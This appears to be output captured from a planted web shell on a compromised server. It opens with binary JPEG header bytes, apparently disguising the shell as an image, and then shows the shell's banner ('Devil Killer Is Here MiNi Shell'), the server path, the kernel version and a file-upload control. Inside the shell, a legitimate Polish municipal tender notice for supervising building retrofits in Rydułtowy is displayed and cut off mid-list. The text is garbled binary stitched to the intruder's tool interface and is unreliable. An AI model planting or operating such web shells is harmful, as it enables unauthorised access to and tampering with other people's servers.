JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230301/0011609801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją zadania pod nazwą: Poprawa efektywności energetycznej w mieszkalnych budynkach komunalnych w Rydułtowach - etap VI </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Rydułtowy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258635</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ofiar Terroru 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rydułtowy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-280</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@rydultowy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rydultowy.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją zadania pod nazwą: Poprawa efektywności energetycznej w mieszkalnych budynkach komunalnych w Rydułtowach - etap VI </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d32b1691-b80f-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00116098</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00027088/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Pełnienie funkcji inspektora inwestorskiego nad realizacją zadania pod nazwą: Poprawa efektywności energetycznej w mieszkalnych budynkach komunalnych w Rydułtowach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie będzie współfinansowane w ramach projektu: &#34;Poprawa efektywności energetycznej w mieszkalnych budynkach komunalnych w Rydułtowach&#34; w ramach działania POIS.01.07.00 -Kompleksowa likwidacja niskiej emisji na terenie województwa śląskiego oś priorytetowa POIS.01.00.00 - Zmniejszenie emisyjności gospodarki Programu Operacyjnego Infrastruktura i Środowisko 2014 -2020. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/rydultowy <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/rydultowy</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. 2. Komunikacja w postępowaniu odbywa się elektronicznie za pośrednictwem platformy (portalu) https://platformazakupowa.pl/pn/rydultowy i formularza &#34;Wyślij wiadomość&#34;. W korespondencji należy posługiwać się znakiem sprawy względnie ID postępowania.<br/>3. Korzystanie z serwisu (platformy) wymaga zapoznania się Regulaminem dla Użytkowników (Wykonawców) dostępnego na portal_<br/>https://platformazakupowa.pl/pn/rydultowy.<br/>4. Minimalne wymagania techniczne umożliwiające korzystanie ze strony platformazakupowa.pl to przeglądarka internetowa Internet<br/>Explorer, Chrome i FireFox w najnowszej dostępnej wersji, z<br/>włączoną obsługą języka Javascript, akceptująca pliki typu „cookies” oraz łącze internetowe o przepustowości, co najmniej 256<br/>kbit/s. platformazakupowa.pl jest zoptymalizowana dla minimalnej<br/>rozdzielczości ekranu 1024x768 pikseli. Szyfrowanie danych odbywa się przy pomocy protokołu SSL.5. Kodowanie i czas: Plik<br/>załączony i zapisany przez Wykonawcę na platformie nie jest widoczny dla<br/>Zamawiającego, gdyż jest przechowywany na osobnym szyfrującym serwerze i zaszyfrowany. Możliwość pobrania plików przez Zamawiającego następuje po upłynięciu terminu otwarcia ofert oraz ich odszyfrowaniu w systemie. Oznaczenie czasu odbioru danych przez platformę stanowi przypiętą do oferty elektronicznej datę oraz dokładny czas (hh:mm:ss), znajdujące się w kolumnie dotyczącej danej oferty, w sekcji - &#34;Data złożenia oferty&#34;.<br/>6. Komunikacja przez &#34;Wyślij wiadomość&#34; umożliwia dodanie do treści wysyłanej wiadomości plików lub spakowanego katalogu (załączników). Występuje limit objętości plików lub spakowanego katalogu w zakresie całej wiadomości do 1 GB przy maksymalnej ilości 20 plików lub spakowanych katalogów. Zamawiający, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript, 5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3. 7) Oznaczenie czasu odbioru danych przez<br/>platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. Ofertę składa się, pod<br/>rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. Szczegółowy opis został zawarty w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">: 1) administratorem Pani/Pana danych osobowych jest: Minister Funduszy i Polityki<br/>Regionalnej pełniący funkcję Instytucji Zarządzającej Programem Operacyjnym Infrastruktura i Środowisko (POIiŚ) 2014-2020, z<br/>siedzibą przy ul. Wspólnej 2/4, 00-926 Warszawa, 2) inspektor ochrony danych jest dostępny pod numerem (032 4537480) oraz pod<br/>adresem e-mail iod@rydultowy.pl, 3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem, 4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ust. 1 oraz art. 74 ust.1 ustawy Pzp, 5) Pani/Pana dane<br/>osobowe będą przechowywane zgodnie z okresem archiwizacji przewidzianym dla projektów współfinansowanych ze środków UE,<br/>tj.: zgodnie z zapisami Rozporządzenia Rady 1303/2013 oraz aktualnymi wytycznymi w ramach Programu Operacyjnego<br/>Infrastruktura i Środowisko 2014-2020, 6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy; 7) w odniesieniu do Pani/Pana danych<br/>osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; 8) posiada Pani/Pan: a) na<br/>podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; W przypadku gdy wykonanie obowiązków, o<br/>których mowa w art. 15 ust. 1-3 rozporządzenia RODO, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od<br/>osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania<br/>nazwy lub postępowania o udzielenie zamówienia publicznego, b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana<br/>danych osobowych, przy czym skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą umowy w zakresie niezgodnym z Pzp oraz nie może naruszać integralności<br/>protokołu oraz jego załączników, c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; Wystąpienie z żądaniem, o którym mowa<br/>w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego. W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia<br/>RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego<br/>protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że<br/>zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia RODO. Udostępnianie, o którym mowa powyżej, ma<br/>zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 rozporządzenia RODO<br/>zebranych w toku postępowania o udzielenie zamówienia. Ograniczenia zasady jawności, o których mowa w ust. 3 i art. 18 ust. 3-6,<br/>stosuje się odpowiednio, d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 9) nie przysługuje Pani/Panu: a) w związku z art.<br/>17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych: b) prawo do przenoszenia danych osobowych, o którym mowa<br/>w art. 20 RODO, c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia RODO, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BP.271.000005.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> OPIS PRZEDMIOTU ZAMÓWIENIA: W budynku przy ul. Gen. Józefa Bema 6/6a przewidziane są prace termomodernizacyjne obejmujące swym zakresem między innymi:<br/>1) Rozbiórkę i demontaż pieców węglowych w postaci pieców kaflowych pokojowych, pieców kaflowych kuchennych oraz pieców węglowych typu „koza”. <br/>2) Remont pomieszczeń piwnicznych:<br/> a) wykonanie wewnętrznej hydroizolacji ścian;<br/> b) demontaż stolarki drzwiowej;<br/> c) rozbiórka i wymurowanie ścian działowych w piwnicy;<br/> d) wymiana podłogi na gruncie;<br/> e) skucie istniejących tynków;<br/> f) wykonanie zabiegu iniekcji;<br/> g) wykonanie tynków renowacyjnych na ścianach;<br/> h) montaż stolarki drzwiowej;<br/> 3) Adaptację strychu na kotłownię gazową:<br/> a) rozebranie istniejących ścianek działowych z deskowania, oddzielających pomieszczenia strychu od klatki schodowej;<br/> b) rozebranie komina znajdującego się w pomieszczeniu 2.11,<br/> c) wykonanie w ścianie zewnętrznej tymczasowego otworu montażowego umożliwiającego wprowadzenie belek stalowych do wzmocnienia stropu; <br/> d) wykonanie wzmocnienia stropu pod projektowane zbiorniki wody;<br/> e) wymiana warstw posadzkowych oraz wykonanie podestu technicznego;<br/> f) budowa odpowiedniej ściany działowej z G-K wydzielającej pomieszczenie;<br/> g) obudowa części ścian systemem G-K (zabezpieczenie p-poż.);<br/> h) tynkowanie pozostałych ścian niewykończonych płytami G-K;<br/> i) budowa instalacji wewnętrznych zgodnie z wytycznymi branżowymi,<br/> j) impregnacja elementów więźby dachowej,<br/> k) wykonanie odpowiedniej zabudowy więźby dachowej (system G-K),<br/> l) montaż stolarki drzwiowej,<br/> m) roboty towarzyszące.<br/>4) Termomodernizację:<br/> a) wykonanie izolacji termicznej i hydroizolacji ścian zewnętrznych piwnic;<br/> b) ocieplenie ścian zewnętrznych nadziemia w technologii ETICS;<br/> c) ocieplenie dachu styropapą;<br/> d) wymiana stolarki drzwiowej zewnętrznej (część mieszkalna i do pomieszczeń gospodarczych);<br/> e) wymiana stolarki okiennej;<br/> f) montaż parapetów wewnętrznych i zewnętrznych;<br/> g) odtworzenie detali architektonicznych;<br/> h) wykonanie nowych obróbek blacharskich;<br/> i) wykonanie wyprawy tynkarskiej;<br/> j) malowanie elewacji;<br/> k) wykonanie powłoki antygrafitti;<br/> l) przebudowa attyki;<br/> m) przebudowa otworów drzwiowych do pomieszczeń gospodarczych;<br/> n) przebudowa otworu okiennego;<br/> o) wykonanie wyłazu dachowego;<br/> p) remont istniejących kominów;<br/> q) wymiana orynnowania;<br/> r) wymiana barierek okiennych ochronnych, kwiatowych;<br/> s) montaż zadaszenia nad wejściem do części mieszkalnej;<br/> t) montaż oznaczenia adresowego.<br/>5) Wykonanie przyłącza sieci gazu do kotłowni wraz z zewnętrzną i wewnętrzną instalacją - wg części instalacyjnej opracowania,<br/>6) Doposażenie budynku w instalację cwu, tj. montaż rurociągów przewodów wody ciepłej i cyrkulacji, zaworów odcinających i regulacyjnych wraz z robotami towarzyszącymi (montaż wodomierzy jednostrumieniowych suchobieżnych z modułem radiowym w uzgodnieniu z Zamawiającym), izolacja przewodów. Podłączenie przewodów cwu do istniejących lub nowoprojektowanych – wg części instalacyjnej opracowania,<br/>7) Doposażenie budynku w nową kompletną instalację centralnego ogrzewania wraz z montażem podzielników ciepła w uzgodnieniu z Zamawiającym,<br/>8) Modernizacja wewnętrznej instalacji elektrycznej - wg części instalacyjnej opracowania,<br/>9) Wymianę instalacji odgromowej - wg części instalacyjnej opracowania,<br/>10) Wykonanie instalacji AZART - wg części instalacyjnej opracowania,<br/>11) Wentylacja:<br/> a) montaż kanałów wentylacyjnych,<br/> b) montaż kratek wywiewnych oraz nasad kominowych,<br/> c) montaż izolacji cieplnej,<br/> d) montaż obudów,<br/>12) Przyłącze kanalizacji deszczowej wraz z drenażem:<br/> a) odprowadzenie wód opadowych i roztopowych do istniejącej sieci kanalizacji deszczowej,<br/> b) wykonaniem drenażu opaskowego,<br/>13) Zasilanie kuchenek elektrycznych oraz pompy kanalizacji deszczowej:<br/> a) zasilenie projektowanych kuchenek, <br/> b) zasilenie przepompowni wód deszczowych,<br/> c) zakup i montaż kuchenek elektrycznych dwupalnikowych.<br/>14) Wykonanie zaleceń zgodnie z ekspertyzą ornintologiczno-chiropterologiczną,<br/><br/> 1. OPIS PRZEDMIOTU ZAMÓWIENIA<br/> W budynku przy ul. Gen. Józefa Bema 28 przewidziane są prace termomodernizacyjne obejmujące swym zakresem między innymi:<br/> 1) rozbiórka istniejącej podłogi na gruncie i wykonanie nowych warstw,<br/> 2) wykonanie termoizolacji ścian zewnętrznych piwnic,<br/> 3) wykonanie hydroizolacji ścian zewnętrznych piwnic,<br/> 4) izolacja pozioma ścian zewnętrznych piwnic metodą iniekcji,<br/> 5) wykonanie tynków renowacyjnych w poziomie piwnic,<br/> 6) demontaż ocieplenia wschodniej ściany zewnętrznej segmentu nr 2 (w porozumieniu z właścicielami sąsiedniej działki),<br/> 7) wykonanie termoizolacji (metoda lekka mokra ETICS) ścian zewnętrznych kondygnacji nadziemnych,<br/> 8) rozbiórka istniejących pieców węglowych,<br/> 9) uzupełnienie brakujących elementów wykończenia w miejscach po rozebranych piecach,<br/> 10) demontaż istniejących warstw stropu nad poddaszem użytkowym,<br/> 11) docieplenie stropu nad poddaszem użytkowym,<br/> 12) docieplenie skosów dachu skośnego,<br/> 13) demontaż istniejącego wyposażenia budynku, będącego w kolizji z wykonywanymi pracami oraz ponowny montaż ww. wyposażenia,<br/> 14) wymiana wyłazu dachowego,<br/> 15) docieplenie dachu płaskiego nad łącznikiem,<br/> 16) docieplenie dachu płaskiego nad częścią mieszkalną,<br/> 17) domurowanie ścianek ogniowych przy dachach płaskich,<br/> 18) wykonanie nowej obróbki blacharskiej,wydłużenie połaci dachu płaskiego poprzez dosztukowanie krokwi,<br/> 19) montaż nowych rynien i rur spustowych,<br/> 20) demontaż istniejącego pokrycia dachu skośnego,<br/> 21) wykonanie nowego pokrycia dachu skośnego,<br/> 22) wykonanie opaski wokół budynku,<br/> 23) rozbiórka istniejących szachtów i montaż systemowych doświetlaczy piwnicznych,<br/> 24) rozbiórka i wymurowanie ścian działowych w piwnicy,<br/> 25) wymiana stolarki okiennej wraz z montażem nowych parapetów zewnętrznych i wewnętrznych oraz barierek ochronnych,<br/> 26) wymiana stolarki drzwiowej zewnętrznej,<br/> 27) remont schodów zewnętrznych wraz z demontażem starych i montażem nowych balustrad,<br/> 28) wykonanie systemowego zadaszenia nad wejściami do budynku,<br/> 29) dostosowanie pomieszczenia na potrzeby kotłowni gazowej,<br/> 30) wykonanie obudowy pomieszczenia kotłowni,<br/> 31) wzmocnienie stropu pod pomieszczeniem kotłowni,<br/> 32) wykonanie wyłazu stropowego pomiędzy belkami stropowymi 60x100 cm,<br/> 33) wykonanie komunikacji dachowej,<br/> 34) wymiana elementów drewnianych celem wykonania otworu drzwiowego odpowiednich wymiarów,<br/> 35) wykonanie przyłącza sieci gazu do kotłowni wraz z zewnętrzną i wewnętrzną instalacją - wg części instalacyjnej opracowania,<br/> 36) doposażenie budynku w instalację cwu, tj. montaż rurociągów przewodów wody ciepłej i cyrkulacji, zaworów odcinających i regulacyjnych wraz z robotami towarzyszącymi (montaż wodomierzy jednostrumieniowych suchobieżnych z modułem radiowym w uzgodnieniu z Zamawiającym), izolacja przewodów. Podłączenie przewodów cwu do istniejących lub nowoprojektowanych – wg części instalacyjnej opracowania,<br/> 37) doposażenie budynku w nową kompletną instalację centralnego ogrzewania wraz z montażem podzielników ciepła w uzgodnieniu z Zamawiającym,<br/> 38) modernizacja wewnętrznej instalacji elektrycznej - wg części instalacyjnej opracowania,<br/> 39) budowę wewnętrznej instalacji gazu,<br/> 40) przebudowę i dobudowę kanałów wentylacyjnych:<br/>a) zabudowa w istniejących kominach dymowych przewodów wentylacji grawitacyjnej z rur o średnicy 160 mm, wykonanych ze stali nierdzewnej,<br/>b) zabudowa na kominach nasad - daszków ze stali nierdzewnej,<br/>c) zabudowa w mieszkaniach nowych kratek wlotowych 20 x 20 cm,<br/>d) zabudowa w mieszkaniach dodatkowych przewodów wentylacji grawitacyjnej o średnicy 160 mm ze stali nierdzewnej, obudowanych płytami G-K,<br/>e) wykonanie w świetle strychu zamocowań dla dodatkowych, preizolowanych termicznie przewodów wentylacji grawitacyjnej,<br/>f) zabudowa na dachu systemowych przepustów i podstaw dachowych dla kominów wentylacyjnych preizolowanych,<br/> g) podłączenie projektowanych kominów do instalacji piorunochronnej,<br/>h) zabudowa na ostatniej kondygnacji klatki schodowej kanału wentylacyjnego 20x20 cm z kratkami zewnętrzną i wewnętrzną,<br/> 41) 